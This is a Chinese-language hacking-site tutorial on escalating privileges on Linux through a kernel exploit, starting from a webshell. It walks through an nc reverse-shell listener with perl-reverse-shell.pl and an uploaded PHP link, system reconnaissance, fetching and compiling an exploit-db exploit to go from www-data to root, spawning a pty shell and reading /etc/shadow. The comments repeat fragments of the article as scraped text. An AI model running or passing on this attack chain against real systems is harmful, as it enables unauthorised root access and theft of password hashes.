LINUX 内核漏洞提权

LINUX 内核漏洞提权

黑客资讯访客1970-01-01 8:00:002594A+A-

1、简介

通常我们在拥有一个webshell的时候,一般权限都是WEB容器权限,如在iis就是iis用户组权限,在apache 就是apache权限,一般都是权限较低,均可执行一些普通命令,如查看当前用户,网络信息,ip信息等。如果我想进行内网渗透就必须将权限提权到最高,如系统权限 超级管理员权限。

2、创建交互shell

linux 提权 需要交互shell 

可以使用工具  perl-reverse-shell.pl建立 sockets

增加运行权限

chmod +x perl-reverse-shell.pl

本地使用nc 监听端口

nc -vvlp 1234

http://www.moontester.com/upload/ec69e40706de8558e71cd85cd17589b3x.php

1.png

nc 监听

 

 

1559889033322738.png

 

3、查看发行版

 

cat /etc/issue
cat /etc/*release

查看内核版本

uname -a

 

4、查找可用的提权exp

 

https://www.exploit-db.com/
Linuxmoonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32
:37 UTC 2015x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/37292

5、进行提权

在目标机子编译提权exp 如果编译不成功在本地编译后在上传的目标上


gcc exp.c  -o exp

增加运行权限 chmod +x exp

运行 ./exp

3png.png

 

当前用户从www-data提权到 root


切换shell

python -c 'importpty; pty.spawn("/bin/bash")'

查询当前用户 id

查询密文文件

cat /etc/shadow

 

5.png

点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 4条评论
  • 只酷节枝2022-05-28 06:33:15
  • 64 x86_64 GNU/Linuxhttps://www.exploit-db.com/exploits/372925、进行提权在目标机子编译提权exp 如果编译不成功在本地编译后在上传的目标上gcc exp.c  -o exp增加运行权限 chmod +x exp运行
  • 闹旅擅傲2022-05-28 15:37:05
  • xp运行 ./exp 当前用户从www-data提权到 root切换shellpython -c 'importpty; pty.spawn("/bin/bash")'查询当前用户 id查询密文文件cat /etc/shadow 
  • 听弧等灯2022-05-28 14:47:17
  • ps://www.exploit-db.com/Linuxmoonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu SMP Thu Apr 16 23:32:37 UTC 2015x86_64 x86_64 x86_64 GNU/Li
  • 纵遇拥野2022-05-28 13:46:50
  • /etc/*release查看内核版本uname -a 4、查找可用的提权exp https://www.exploit-db.com/Linuxmoonteam-virtual-machine 3.19.0-15-generic #15-Ubuntu

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理